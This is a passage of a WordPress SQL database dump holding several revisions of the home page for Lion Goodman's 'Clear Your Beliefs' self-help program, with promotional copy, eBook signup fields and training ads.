Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:22:22', '2014-11-18 23:22:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1769, 2, '2014-11-18 18:23:52', '2014-11-18 23:23:52', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:-10px !important; width:100% !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:23:52', '2014-11-18 23:23:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1770, 2, '2014-11-18 18:32:45', '2014-11-18 23:32:45', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n&lt;img style=&quot;margin-top:0px !important; width:100% !important;&quot; src=&quot;http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg&quot;\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:32:45', '2014-11-18 23:32:45', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1773, 2, '2014-11-18 18:52:46', '2014-11-18 23:52:46', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p>Complete Program</p><p><img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p><p></p><p></p>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:52:46', '2014-11-18 23:52:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1772, 2, '2014-11-18 18:51:32', '2014-11-18 23:51:32', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p>Complete Program</p><p><img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs </strong></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>– Permanently!</strong></p><p></p><p></p>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:51:32', '2014-11-18 23:51:32', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1774, 2, '2014-11-18 18:56:04', '2014-11-18 23:56:04', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p>Complete Program</p><p><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p><p></p><p> </p>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-18 18:56:04', '2014-11-18 23:56:04', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1775, 2, '2014-11-18 19:00:56', '2014-11-19 00:00:56', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p>Complete Program</p><p><img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /></p><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p><p></p><p></p>\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p><p> </p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 